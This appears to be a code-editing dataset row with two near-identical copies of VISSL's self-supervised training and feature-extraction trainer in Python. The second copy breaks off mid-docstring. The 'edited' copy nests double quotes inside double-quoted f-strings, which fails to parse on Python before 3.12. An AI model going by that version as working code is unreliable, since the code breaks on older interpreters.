edited_code stringlengths 17 978k | original_code stringlengths 17 978k |
|---|---|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import gc
import itertools
import logging
import os
import socket
import time
from typing import Any, Dict, List, Tuple
import numpy as np
import torch
import torch.distributed as dist
from classy_vision.generic.distributed_util import (
barrier,
is_primary,
set_cpu_device,
set_cuda_device_index,
)
from classy_vision.generic.util import copy_model_to_gpu
from classy_vision.hooks.classy_hook import ClassyHook
from classy_vision.tasks import TASK_REGISTRY, ClassyTask
from vissl.config import AttrDict
from vissl.hooks import SSLClassyHookFunctions
from vissl.models.model_helpers import get_trunk_output_feature_names
from vissl.trainer.train_steps import get_train_step
from vissl.utils.distributed_utils import all_gather_heterogeneous, all_gather_sizes
from vissl.utils.env import get_machine_local_and_dist_rank
from vissl.utils.io import save_file
def build_task(config):
"""Builds a ClassyTask from a config.
This assumes a 'name' key in the config which is used to determine what
task class to instantiate. For instance, a config `{"name": "my_task",
"foo": "bar"}` will find a class that was registered as "my_task"
(see :func:`register_task`) and call .from_config on it."""
task = TASK_REGISTRY[config.TRAINER.TASK_NAME].from_config(config)
return task
class SelfSupervisionTrainer(object):
"""
The main entry point for any training or feature extraction workflows in VISSL.
The trainer constructs a train_task which prepares all the components of the
training (optimizer, loss, meters, model etc) using the settings specified by user
in the yaml config file. See the vissl/trainer/train_task.py for more details.
Args:
cfg (AttrDict): user specified input config that has optimizer, loss, meters etc
settings relevant to the training
dist_run_id (str): For multi-gpu training with PyTorch, we have to specify
how the gpus are going to rendezvous. This requires specifying
the communication method: file, tcp and the unique rendezvous
run_id that is specific to 1 run.
We recommend:
1) for 1node: use init_method=tcp and run_id=auto
2) for multi-node, use init_method=tcp and specify
run_id={master_node}:{port}
checkpoint_path (str): if the training is being resumed from a checkpoint, path to
the checkpoint. The tools/run_distributed_engines.py automatically
looks for the checkpoint in the checkpoint directory.
checkpoint_folder (str): what directory to use for checkpointing. The
tools/run_distributed_engines.py creates the directory based on user
input in the yaml config file.
hooks (List[ClassyHooks]): the list of hooks to use during the training. The hooks
vissl/engines/{train, extract_features}.py determine the hooks.
"""
def __init__(
self,
cfg: AttrDict,
dist_run_id: str,
checkpoint_path: str = None,
checkpoint_folder: str = None,
hooks: List[ClassyHook] = None,
):
self.cfg = cfg
self.dist_run_id = dist_run_id
self.local_rank, self.distributed_rank = get_machine_local_and_dist_rank()
self.setup_distributed(self.cfg.MACHINE.DEVICE == "gpu")
# now we should build the task. The task will also have the State attached
# to it. It will have information about phases (train, test) both. It will
# also contain all the other information like optimizers, etc
self.task = build_task(self.cfg)
self.task.set_checkpoint_path(checkpoint_path)
self.task.set_checkpoint_folder(checkpoint_folder)
if hooks is None:
hooks = []
self.task.set_hooks(hooks)
def setup_distributed(self, use_gpu: bool):
"""
Setup the distributed training. VISSL support both GPU and CPU only training.
(1) Initialize the torch.distributed.init_process_group if the distributed is
not already initialized. The init_method, backend are specified by user in the
yaml config file. See vissl/defaults.yaml file for description on how to set
init_method, backend.
(2) We also set the global cuda device index using torch.cuda.set_device or
cpu device
"""
# we overwrite the distributed trainer setup here with our config options
distributed_world_size = int(os.environ["WORLD_SIZE"])
assert distributed_world_size % self.cfg.DISTRIBUTED.NUM_NODES == 0
init_method = f"{self.cfg.DISTRIBUTED.INIT_METHOD}://{self.dist_run_id}"
logging.info(
f"Using Distributed init method: {init_method}, "
f"world_size: {distributed_world_size}, rank: {self.distributed_rank}"
)
if not torch.distributed.is_initialized():
torch.distributed.init_process_group(
backend=self.cfg.DISTRIBUTED.BACKEND,
init_method=init_method,
world_size=distributed_world_size,
rank=self.distributed_rank,
)
else:
logging.warning(
"Torch distributed has already been initialized, \
reusing existing configuration"
)
logging.info(
"| initialized host {} as rank {} ({})".format(
socket.gethostname(),
self.distributed_rank,
torch.distributed.get_rank(),
)
)
if use_gpu:
set_cuda_device_index(self.local_rank)
# perform a dummy all-reduce to initialize the NCCL communicator
if torch.cuda.is_available() and (self.cfg.DISTRIBUTED.BACKEND == "nccl"):
dist.all_reduce(torch.zeros(1).cuda())
else:
set_cpu_device()
def train(self):
"""
The train workflow. We get the training loop to use (vissl default is
standard_train_step) but the user can create their own training loop
and specify the name TRAINER.TRAIN_STEP_NAME
The training happens:
1. Execute any hooks at the start of training (mostly resets the variable like
iteration num phase_num etc)
2. For each epoch (train or test), run the hooks at the start of an epoch. Mostly
involves setting things like timer, setting dataloader epoch etc
3. Execute the training loop (1 training iteration) involving forward, loss, backward,
optimizer update, metrics collection etc.
4. At the end of epoch, sync meters and execute hooks at the end of phase. Involves
things like checkpointing model, logging timers, logging to tensorboard etc
"""
train_step_fn = get_train_step(self.cfg["TRAINER"]["TRAIN_STEP_NAME"])
self.task.prepare(pin_memory=self.cfg.DATA.PIN_MEMORY)
self.task.init_distributed_data_parallel_model()
# Find what phase, train_phase_idx, local_iteration_num we are starting from.
# Recover it from the checkpoint (if available)
task, phase_idx, iteration_num = self._init_training_state(self.cfg, self.task)
# Good to go, (re) start training
task.run_hooks(SSLClassyHookFunctions.on_start.name)
if is_primary():
logging.info("Model is:\n {}".format(task.model))
logging.info("Loss is: {}".format(task.loss))
logging.info("Starting training....")
while phase_idx + 1 < len(task.phases):
self._advance_phase(task) # advances task.phase_idx
phase_idx += 1
iteration_num += 1
task.local_iteration_num = iteration_num # iteration_num=0 at this step
task.run_hooks(SSLClassyHookFunctions.on_phase_start.name)
while True:
try:
if self.cfg.MODEL.CUDA_CACHE.CLEAR_CUDA_CACHE and (
iteration_num % self.cfg.MODEL.CUDA_CACHE.CLEAR_FREQ == 0
):
logging.info(
f"Emptying CUDA cache at step count: {iteration_num}"
)
torch.cuda.empty_cache()
logging.info("CUDA cache cleared")
task = train_step_fn(task)
iteration_num += 1
task.local_iteration_num = iteration_num
# Book-keeping: update the training iteration number (only updated
# if it's a training phase).
task.iteration += 1 if task.train else 0
# Book-keeping. Track how many forward passes have been done.
# aka how many batches have been seen by the trainer irrespective of
# the train or test phase.
task.batches += 1
# update the batch time aka the training time for the current iteration.
task.batch_time.append(time.time() - task.start_time)
task.start_time = time.time()
task.run_hooks(SSLClassyHookFunctions.on_step.name)
except StopIteration:
break
except Exception as e:
task.run_hooks(SSLClassyHookFunctions.on_exception.name)
raise e
for meter in task.meters:
meter.sync_state()
logging.info("Meters synced")
barrier()
task.run_hooks(SSLClassyHookFunctions.on_phase_end.name)
task.run_hooks(SSLClassyHookFunctions.on_end.name)
if hasattr(task, "data_iterator"):
del task.data_iterator
gc.collect()
if hasattr(task, "dataloaders"):
del task.dataloaders
gc.collect()
@staticmethod
def _init_training_state(cfg, task: ClassyTask) -> Tuple[ClassyTask, int, int]:
"""
If a checkpoint is present, recover the current training status.
If not initialize everything properly
Args:
task {ClassyTask}: object consisting of all components a training requires
(meters, optimizers, model, loss etc.)
Returns:
task {ClassyTask}: updated task
phase_idx {int}: phase index
iteration_num: iteration number
"""
phase_idx, iteration_num = -1, -1
# Ensure that train loader exists. Will NOT exist if config.TEST_ONLY is True
if "train" in task.dataloaders.keys():
loader_key = "train"
else:
loader_key = "test"
task.max_iteration = task.num_train_phases * len(task.dataloaders[loader_key])
if task.checkpoint is not None:
phase_idx = task.checkpoint["phase_idx"]
task.train_phase_idx = task.checkpoint["train_phase_idx"]
task.local_iteration_num = task.checkpoint["iteration_num"]
task.iteration = task.checkpoint["iteration"]
else:
task.iteration = 0
task.local_iteration_num = iteration_num
num_iter_in_phase = len(task.dataloaders[loader_key])
num_iter_in_epoch = num_iter_in_phase * task.num_train_phases_per_epoch
num_samples = task.num_phase_samples(loader_key)
task.start_time = time.time()
task.batch_time = []
task.metrics = {}
logging.info(f"Training {task.num_epochs} epochs")
logging.info(f"One epoch = {num_iter_in_epoch} iterations.")
logging.info(f"Total {num_samples} samples in one epoch")
if task.num_epochs != task.num_train_phases:
logging.info(f"Training a total of {task.num_train_phases} train phases.")
logging.info(f"One phase = {num_iter_in_phase} iterations.")
logging.info(f"Total {task.max_iteration} iterations for training")
return task, phase_idx, task.local_iteration_num
def _advance_phase(self, task: ClassyTask):
"""
Advance the training phase to the next phase.
- Updates the phase number,
- resets the meters,
- reset losses,
- recreates the data iterator and destroys previous iterator
- set the model to be in train or eval phase depending on what phase we are in
- execute any optimizer update (normally learning rate updates etc at the end of
an epoch)
"""
# reset the meters at the beginning of the epoch
for meter in task.meters:
meter.reset()
# reset the loss history for this epoch
task.losses = []
# advance the epoch num to be current
task.phase_idx += 1
phase = task.phases[task.phase_idx]
task.train = True if phase["train"] else False
if task.train:
task.train_phase_idx += 1
# get a new data iterator - delete the iterator at the beginning explicitly
# so that all dataloader processes are cleaned up
phase_type = "train" if phase["train"] else "test"
# we are advancing to next epoch, so no need to compute start_iter,
# just let it to be 0 inside of recreate_data_iterator. However, if we are just
# starting from the resumed training, we want to compute_start_iter
# again (if applicable) since we recreate the data iterator and delete
# the old ones.
compute_start_iter = False
if task.checkpoint is not None and task.checkpoint["train_phase_idx"] == (
task.train_phase_idx - 1
):
compute_start_iter = True
task.recreate_data_iterator(
phase_type,
epoch=task.phase_idx,
compute_start_iter=compute_start_iter,
train_phase_idx=task.train_phase_idx,
)
# set the model to train or eval depending on what phase we are in
task.model.train(phase["train"])
if task.train and task.train_phase_idx >= 0:
task.optimizer.on_epoch(task.where)
local_rank, _ = get_machine_local_and_dist_rank()
logging.info(f"Phase advanced. Rank: {local_rank}")
def extract(
self,
output_folder: str,
extract_features: bool = True,
extract_predictions: bool = False,
) -> None:
"""
Extract workflow supports multi-gpu feature extraction and also extracting
predicted labels. Since we are only extracting features or label predictions,
only the model is built (and initialized from some model weights file
if specified by user). Optionally the meters are built if the labels
are being extracted. The model is set to the eval mode fully.
The features / labels are extracted for whatever data splits (train, val, test)
the user wants.
"""
# support feature extraction on gpu only.
assert self.task.device.type == "cuda", "Set MACHINE.DEVICE = gpu"
self.task.prepare_extraction(pin_memory=self.cfg.DATA.PIN_MEMORY)
# Create distributed model
self._add_dummy_layer()
self.task.init_distributed_data_parallel_model()
if is_primary():
logging.info(f"Model is:\n {self.task.model}")
# Get the names of the features that we are extracting. If user doesn't
# specify the features to evaluate, we get the full model output and freeze
# head/trunk both as caution.
feat_names = get_trunk_output_feature_names(self.cfg.MODEL)
if len(feat_names) == 0:
feat_names = ["heads"]
for split in self.task.available_splits:
logging.info(f"============== Split: {split} =======================")
self.task.data_iterator = iter(self.task.dataloaders[split.lower()])
if extract_features:
logging.info(f"Extracting features for partition: {split.lower()}")
self._extract_split_features(
feat_names, self.task, split, output_folder
)
logging.info(f"Done getting features for partition: {split.lower()}")
if extract_predictions:
logging.info(f"Extracting predictions for partition: {split.lower()}")
self._extract_split_label_predictions(
feat_names, self.task, split, output_folder
)
logging.info(f"Done getting predictions for partition: {split.lower()}")
self._cleanup_task()
def _to_unique_feature_names(self, feat_names: List[str]) -> List[str]:
"""
We may have multiple head with different average pooling for
the same features. In case of export, we want to make sure to
export the outputs of these heads with different names.
This function will rename the features in the following way:
["res4", "res4", "res5"] -> ["res4", "res4_1", "res5"]
No effect if there are no duplicate feature names.
"""
counter = {}
new_feat_names = []
for feat_name in feat_names:
index = counter.get(feat_name, 0)
if index > 0:
new_feat_names.append(f"{feat_name}_{index}")
else:
new_feat_names.append(feat_name)
counter[feat_name] = index + 1
return new_feat_names
def _extract_split_label_predictions(
self,
feat_names: List[str],
task: ClassyTask,
split_name: str,
output_folder: str,
):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
dist_rank = torch.distributed.get_rank()
feat_names = self._to_unique_feature_names(feat_names)
out_predictions, out_targets, out_scores = {}, {}, {}
for feat_name in feat_names:
out_predictions[feat_name] = {}
out_scores[feat_name] = {}
out_targets[feat_name] = {}
assert len(task.meters) > 0, "Please specify one meter to extract predictions"
assert len(task.meters) == 1, "Please use only one meter to extract predictions"
for meter in task.meters:
assert hasattr(
meter, "get_predictions"
), f"Meter {meter.name} doesn't implement get_predictions function"
for count in itertools.count(start=0, step=1):
try:
if count % 100 == 0:
logging.info(f"Label prediction extraction iteration: {count}")
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"input": torch.cat(sample["data"]).cuda(non_blocking=True),
"target": torch.cat(sample["label"]).cpu().numpy(),
"inds": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
model_output = task.model(input_sample["input"])
# get the model predictions using the meter
if isinstance(model_output, list):
model_output_cpu = [x.cpu() for x in model_output]
else:
model_output_cpu = model_output.cpu()
for meter in task.meters:
meter.update(
model_output_cpu, sample["label"][0].detach().cpu()
)
predictions, pred_scores = task.meters[0].get_predictions(
model_output_cpu
)
num_images = input_sample["inds"].shape[0]
for num, layer_name in enumerate(feat_names):
pred = predictions[num]
score = pred_scores[num]
targets = input_sample["target"]
for idx in range(num_images):
index = input_sample["inds"][idx]
if not (index in out_predictions[layer_name]):
out_targets[layer_name][index] = targets[idx].reshape(
-1
)
out_predictions[layer_name][index] = pred[idx]
out_scores[layer_name][index] = score[idx]
except StopIteration:
break
# print the meters results. This can offer a validation
# of the extracted predictions.
self._sync_and_print_meters(task)
# save the predictions, targets and image indices now
self._save_extracted_label_predictions(
predictions=out_predictions,
confidence_scores=out_scores,
targets=out_targets,
dist_rank=dist_rank,
split=split_name,
output_folder=output_folder,
)
@staticmethod
def _save_extracted_label_predictions(
predictions,
confidence_scores,
targets,
dist_rank: int,
split: str,
output_folder: str,
):
output = {}
for layer_name in predictions.keys():
predictions[layer_name] = dict(sorted(predictions[layer_name].items()))
targets[layer_name] = dict(sorted(targets[layer_name].items()))
confidence_scores[layer_name] = dict(
sorted(confidence_scores[layer_name].items())
)
preds = np.array(torch.stack(list(predictions[layer_name].values())))
scores = np.array(torch.stack(list(confidence_scores[layer_name].values())))
N = preds.shape[0]
output[layer_name] = {
"predictions": preds.reshape(N, -1),
"confidence_scores": scores.reshape(N, -1),
"targets": np.array(list(targets[layer_name].values())),
"inds": np.array(list(predictions[layer_name].keys())),
}
split = split.lower()
for layer_name, layer_prediction in output.items():
out_pred_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_predictions.npy"
)
out_scores_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_conf_scores.npy"
)
out_target_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_targets.npy"
)
out_inds_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_inds.npy"
)
logging.info(
f"For {layer_name}, "
f"saving predictions: {layer_prediction["predictions"].shape}, "
f"saving scores: {layer_prediction["confidence_scores"].shape}, "
f"targets: {layer_prediction["targets"].shape}, "
f"inds: {layer_prediction["inds"].shape}"
)
save_file(layer_prediction["predictions"], out_pred_file)
save_file(layer_prediction["confidence_scores"], out_scores_file)
save_file(layer_prediction["targets"], out_target_file)
save_file(layer_prediction["inds"], out_inds_file)
def _sync_and_print_meters(self, task):
for meter in task.meters:
meter.sync_state()
logging.info("Meters synced")
if is_primary():
rank, _ = get_machine_local_and_dist_rank()
for meter in task.meters:
if len(task.meters) > 0 and (
(task.train and task.config["METERS"]["enable_training_meter"])
or (not task.train)
):
meter_value = meter.value
metric_key = f"{meter.name}"
if metric_key not in task.metrics:
task.metrics[metric_key] = []
task.metrics[metric_key].append(meter_value)
logging.info(
f"Rank: {rank}, name: {metric_key}, value: {meter_value}"
)
@staticmethod
def _flatten_features_list(features: Dict[str, Any]):
assert isinstance(features, list), "features must be of type list"
is_nested = isinstance(features[0], list)
if is_nested:
flat_features_list = [item for sublist in features for item in sublist]
return flat_features_list
return features
@staticmethod
def _save_extracted_features(
features,
targets,
dist_rank: int,
chunk_index: int,
split: str,
output_folder: str,
):
output = {}
for layer_name in features.keys():
indices = sorted(features[layer_name].keys())
if len(indices) > 0:
output[layer_name] = {
"inds": np.array(indices),
"features": np.array([features[layer_name][i] for i in indices]),
"targets": np.array([targets[layer_name][i] for i in indices]),
}
for layer_name, layer_features in output.items():
out_feat_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_features.npy",
)
out_target_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_targets.npy",
)
out_inds_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_inds.npy",
)
save_file(layer_features["features"], out_feat_file)
save_file(layer_features["targets"], out_target_file)
save_file(layer_features["inds"], out_inds_file)
def _extract_split_features(
self,
feat_names: List[str],
task: ClassyTask,
split_name: str,
output_folder: str,
):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
dist_rank = torch.distributed.get_rank()
out_features, out_targets = {}, {}
for feat_name in feat_names:
out_features[feat_name], out_targets[feat_name] = {}, {}
chunk_index = 0
feature_buffer_size = 0
while True:
try:
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"input": torch.cat(sample["data"]).cuda(non_blocking=True),
"target": torch.cat(sample["label"]).cpu().numpy(),
"inds": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
features = task.model(input_sample["input"])
flat_features_list = self._flatten_features_list(features)
num_images = input_sample["inds"].shape[0]
feature_buffer_size += num_images
for num, feat_name in enumerate(feat_names):
feature = flat_features_list[num].cpu().numpy()
targets = input_sample["target"]
for idx in range(num_images):
index = input_sample["inds"][idx]
out_features[feat_name][index] = feature[idx]
out_targets[feat_name][index] = targets[idx].reshape(-1)
if (
feature_buffer_size
>= self.cfg.EXTRACT_FEATURES.CHUNK_THRESHOLD
>= 0
):
self._save_extracted_features(
features=out_features,
targets=out_targets,
dist_rank=dist_rank,
chunk_index=chunk_index,
split=split_name,
output_folder=output_folder,
)
for layer_name in out_features.keys():
out_features[layer_name].clear()
chunk_index += 1
feature_buffer_size = 0
except StopIteration:
self._save_extracted_features(
features=out_features,
targets=out_targets,
dist_rank=dist_rank,
chunk_index=chunk_index,
split=split_name,
output_folder=output_folder,
)
break
def _add_dummy_layer(self):
"""
In case of feature evaluation mode, if we are freezing both trunk and
head, DDP won't work as there are no parameters in the model. Adding
the dummy head will lead to features being not right. So we rather
add the dummy layer to the model and use DDP. We copy the model to
gpu (if using gpus) after the new dummy layer addition.
"""
fully_frozen_model = self.task.base_model.is_fully_frozen_model()
if fully_frozen_model:
self.task.base_model.dummy_layer = torch.nn.Linear(4, 4)
if self.task.device.type == "cuda":
self.task.base_model = copy_model_to_gpu(self.task.base_model)
def _cleanup_task(self):
if hasattr(self.task, "data_iterator"):
del self.task.data_iterator
gc.collect()
if hasattr(self.task, "dataloaders"):
del self.task.dataloaders
gc.collect()
def extract_clusters(self) -> Dict[str, Dict[int, int]]:
"""
Workflow to extract multi-gpu cluster extraction for pre-trained models
based on clusterization (SwAV, DeepCluster, etc).
The function returns a map from image index to cluster index for the
whole dataset for each of the different splits.
"""
# Support feature extraction on gpu only.
assert self.task.device.type == "cuda", "Set MACHINE.DEVICE = gpu"
self.task.prepare_extraction(pin_memory=self.cfg.DATA.PIN_MEMORY)
# Assert that the model support extract of clusters
error_message = "Extracting clusters is only available for pre-training methods based on clusters" # NOQA
assert self.task.base_model.is_clustering_model(), error_message
# Create distributed model
self._add_dummy_layer()
self.task.init_distributed_data_parallel_model()
if is_primary():
logging.info("Model is:\n {}".format(self.task.model))
# Compute the cluster assignment on each worker in parallel
cluster_assignment = {}
for split in self.task.available_splits:
msg = f"Extracting cluster assignment for partition: {split}"
logging.info(msg)
cluster_assignment[split] = self._get_cluster_assignment_for_split(
self.task, split
)
logging.info("Done: " + msg)
self._cleanup_task()
# Merge the cluster assignments and group by cluster
return self._merge_cluster_assignments(cluster_assignment)
def _get_cluster_assignment_for_split(self, task: ClassyTask, split: str):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
cluster_assignments = {}
task.data_iterator = iter(self.task.dataloaders[split.lower()])
while True:
try:
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"images": torch.cat(sample["data"]).cuda(non_blocking=True),
"indices": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
features = task.model(input_sample["images"])
features = features[0]
prototype_score = features[1]
prototype_index = prototype_score.argmax(dim=-1)
num_images = input_sample["indices"].shape[0]
for idx in range(num_images):
image_index = input_sample["indices"][idx]
cluster_assignments[image_index] = prototype_index[idx].item()
except StopIteration:
break
return cluster_assignments
@staticmethod
def _merge_cluster_assignments(
rank_cluster_assignment: Dict[str, Dict[int, int]]
) -> Dict[str, Dict[int, int]]:
"""
All gather all the cluster assignments computed by the different workers on
separate parts of the dataset and merge them in a single map
"""
merged_cluster_assignments = {}
for split in rank_cluster_assignment.keys():
split_assignments = list(rank_cluster_assignment[split].items())
image_indices = [assignment[0] for assignment in split_assignments]
image_indices = torch.LongTensor(image_indices).cuda(
torch.cuda.current_device()
)
cluster_indices = [assignment[1] for assignment in split_assignments]
cluster_indices = torch.LongTensor(cluster_indices).cuda(
torch.cuda.current_device()
)
sizes = all_gather_sizes(image_indices)
all_image_indices = all_gather_heterogeneous(sizes, image_indices)
all_cluster_indices = all_gather_heterogeneous(sizes, cluster_indices)
merged_cluster_assignments[split] = {}
for image_indices, cluster_indices in zip(
all_image_indices, all_cluster_indices
):
for image_id, cluster_id in zip(image_indices, cluster_indices):
merged_cluster_assignments[split][
image_id.item()
] = cluster_id.item()
return merged_cluster_assignments
| # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import gc
import itertools
import logging
import os
import socket
import time
from typing import Any, Dict, List, Tuple
import numpy as np
import torch
import torch.distributed as dist
from classy_vision.generic.distributed_util import (
barrier,
is_primary,
set_cpu_device,
set_cuda_device_index,
)
from classy_vision.generic.util import copy_model_to_gpu
from classy_vision.hooks.classy_hook import ClassyHook
from classy_vision.tasks import TASK_REGISTRY, ClassyTask
from vissl.config import AttrDict
from vissl.hooks import SSLClassyHookFunctions
from vissl.models.model_helpers import get_trunk_output_feature_names
from vissl.trainer.train_steps import get_train_step
from vissl.utils.distributed_utils import all_gather_heterogeneous, all_gather_sizes
from vissl.utils.env import get_machine_local_and_dist_rank
from vissl.utils.io import save_file
def build_task(config):
"""Builds a ClassyTask from a config.
This assumes a 'name' key in the config which is used to determine what
task class to instantiate. For instance, a config `{"name": "my_task",
"foo": "bar"}` will find a class that was registered as "my_task"
(see :func:`register_task`) and call .from_config on it."""
task = TASK_REGISTRY[config.TRAINER.TASK_NAME].from_config(config)
return task
class SelfSupervisionTrainer(object):
"""
The main entry point for any training or feature extraction workflows in VISSL.
The trainer constructs a train_task which prepares all the components of the
training (optimizer, loss, meters, model etc) using the settings specified by user
in the yaml config file. See the vissl/trainer/train_task.py for more details.
Args:
cfg (AttrDict): user specified input config that has optimizer, loss, meters etc
settings relevant to the training
dist_run_id (str): For multi-gpu training with PyTorch, we have to specify
how the gpus are going to rendezvous. This requires specifying
the communication method: file, tcp and the unique rendezvous
run_id that is specific to 1 run.
We recommend:
1) for 1node: use init_method=tcp and run_id=auto
2) for multi-node, use init_method=tcp and specify
run_id={master_node}:{port}
checkpoint_path (str): if the training is being resumed from a checkpoint, path to
the checkpoint. The tools/run_distributed_engines.py automatically
looks for the checkpoint in the checkpoint directory.
checkpoint_folder (str): what directory to use for checkpointing. The
tools/run_distributed_engines.py creates the directory based on user
input in the yaml config file.
hooks (List[ClassyHooks]): the list of hooks to use during the training. The hooks
vissl/engines/{train, extract_features}.py determine the hooks.
"""
def __init__(
self,
cfg: AttrDict,
dist_run_id: str,
checkpoint_path: str = None,
checkpoint_folder: str = None,
hooks: List[ClassyHook] = None,
):
self.cfg = cfg
self.dist_run_id = dist_run_id
self.local_rank, self.distributed_rank = get_machine_local_and_dist_rank()
self.setup_distributed(self.cfg.MACHINE.DEVICE == "gpu")
# now we should build the task. The task will also have the State attached
# to it. It will have information about phases (train, test) both. It will
# also contain all the other information like optimizers, etc
self.task = build_task(self.cfg)
self.task.set_checkpoint_path(checkpoint_path)
self.task.set_checkpoint_folder(checkpoint_folder)
if hooks is None:
hooks = []
self.task.set_hooks(hooks)
def setup_distributed(self, use_gpu: bool):
"""
Setup the distributed training. VISSL support both GPU and CPU only training.
(1) Initialize the torch.distributed.init_process_group if the distributed is
not already initialized. The init_method, backend are specified by user in the
yaml config file. See vissl/defaults.yaml file for description on how to set
init_method, backend.
(2) We also set the global cuda device index using torch.cuda.set_device or
cpu device
"""
# we overwrite the distributed trainer setup here with our config options
distributed_world_size = int(os.environ["WORLD_SIZE"])
assert distributed_world_size % self.cfg.DISTRIBUTED.NUM_NODES == 0
init_method = f"{self.cfg.DISTRIBUTED.INIT_METHOD}://{self.dist_run_id}"
logging.info(
f"Using Distributed init method: {init_method}, "
f"world_size: {distributed_world_size}, rank: {self.distributed_rank}"
)
if not torch.distributed.is_initialized():
torch.distributed.init_process_group(
backend=self.cfg.DISTRIBUTED.BACKEND,
init_method=init_method,
world_size=distributed_world_size,
rank=self.distributed_rank,
)
else:
logging.warning(
"Torch distributed has already been initialized, \
reusing existing configuration"
)
logging.info(
"| initialized host {} as rank {} ({})".format(
socket.gethostname(),
self.distributed_rank,
torch.distributed.get_rank(),
)
)
if use_gpu:
set_cuda_device_index(self.local_rank)
# perform a dummy all-reduce to initialize the NCCL communicator
if torch.cuda.is_available() and (self.cfg.DISTRIBUTED.BACKEND == "nccl"):
dist.all_reduce(torch.zeros(1).cuda())
else:
set_cpu_device()
def train(self):
"""
The train workflow. We get the training loop to use (vissl default is
standard_train_step) but the user can create their own training loop
and specify the name TRAINER.TRAIN_STEP_NAME
The training happens:
1. Execute any hooks at the start of training (mostly resets the variable like
iteration num phase_num etc)
2. For each epoch (train or test), run the hooks at the start of an epoch. Mostly
involves setting things like timer, setting dataloader epoch etc
3. Execute the training loop (1 training iteration) involving forward, loss, backward,
optimizer update, metrics collection etc.
4. At the end of epoch, sync meters and execute hooks at the end of phase. Involves
things like checkpointing model, logging timers, logging to tensorboard etc
"""
train_step_fn = get_train_step(self.cfg["TRAINER"]["TRAIN_STEP_NAME"])
self.task.prepare(pin_memory=self.cfg.DATA.PIN_MEMORY)
self.task.init_distributed_data_parallel_model()
# Find what phase, train_phase_idx, local_iteration_num we are starting from.
# Recover it from the checkpoint (if available)
task, phase_idx, iteration_num = self._init_training_state(self.cfg, self.task)
# Good to go, (re) start training
task.run_hooks(SSLClassyHookFunctions.on_start.name)
if is_primary():
logging.info("Model is:\n {}".format(task.model))
logging.info("Loss is: {}".format(task.loss))
logging.info("Starting training....")
while phase_idx + 1 < len(task.phases):
self._advance_phase(task) # advances task.phase_idx
phase_idx += 1
iteration_num += 1
task.local_iteration_num = iteration_num # iteration_num=0 at this step
task.run_hooks(SSLClassyHookFunctions.on_phase_start.name)
while True:
try:
if self.cfg.MODEL.CUDA_CACHE.CLEAR_CUDA_CACHE and (
iteration_num % self.cfg.MODEL.CUDA_CACHE.CLEAR_FREQ == 0
):
logging.info(
f"Emptying CUDA cache at step count: {iteration_num}"
)
torch.cuda.empty_cache()
logging.info("CUDA cache cleared")
task = train_step_fn(task)
iteration_num += 1
task.local_iteration_num = iteration_num
# Book-keeping: update the training iteration number (only updated
# if it's a training phase).
task.iteration += 1 if task.train else 0
# Book-keeping. Track how many forward passes have been done.
# aka how many batches have been seen by the trainer irrespective of
# the train or test phase.
task.batches += 1
# update the batch time aka the training time for the current iteration.
task.batch_time.append(time.time() - task.start_time)
task.start_time = time.time()
task.run_hooks(SSLClassyHookFunctions.on_step.name)
except StopIteration:
break
except Exception as e:
task.run_hooks(SSLClassyHookFunctions.on_exception.name)
raise e
for meter in task.meters:
meter.sync_state()
logging.info("Meters synced")
barrier()
task.run_hooks(SSLClassyHookFunctions.on_phase_end.name)
task.run_hooks(SSLClassyHookFunctions.on_end.name)
if hasattr(task, "data_iterator"):
del task.data_iterator
gc.collect()
if hasattr(task, "dataloaders"):
del task.dataloaders
gc.collect()
@staticmethod
def _init_training_state(cfg, task: ClassyTask) -> Tuple[ClassyTask, int, int]:
"""
If a checkpoint is present, recover the current training status.
If not initialize everything properly
Args:
task {ClassyTask}: object consisting of all components a training requires
(meters, optimizers, model, loss etc.)
Returns:
task {ClassyTask}: updated task
phase_idx {int}: phase index
iteration_num: iteration number
"""
phase_idx, iteration_num = -1, -1
# Ensure that train loader exists. Will NOT exist if config.TEST_ONLY is True
if "train" in task.dataloaders.keys():
loader_key = "train"
else:
loader_key = "test"
task.max_iteration = task.num_train_phases * len(task.dataloaders[loader_key])
if task.checkpoint is not None:
phase_idx = task.checkpoint["phase_idx"]
task.train_phase_idx = task.checkpoint["train_phase_idx"]
task.local_iteration_num = task.checkpoint["iteration_num"]
task.iteration = task.checkpoint["iteration"]
else:
task.iteration = 0
task.local_iteration_num = iteration_num
num_iter_in_phase = len(task.dataloaders[loader_key])
num_iter_in_epoch = num_iter_in_phase * task.num_train_phases_per_epoch
num_samples = task.num_phase_samples(loader_key)
task.start_time = time.time()
task.batch_time = []
task.metrics = {}
logging.info(f"Training {task.num_epochs} epochs")
logging.info(f"One epoch = {num_iter_in_epoch} iterations.")
logging.info(f"Total {num_samples} samples in one epoch")
if task.num_epochs != task.num_train_phases:
logging.info(f"Training a total of {task.num_train_phases} train phases.")
logging.info(f"One phase = {num_iter_in_phase} iterations.")
logging.info(f"Total {task.max_iteration} iterations for training")
return task, phase_idx, task.local_iteration_num
def _advance_phase(self, task: ClassyTask):
"""
Advance the training phase to the next phase.
- Updates the phase number,
- resets the meters,
- reset losses,
- recreates the data iterator and destroys previous iterator
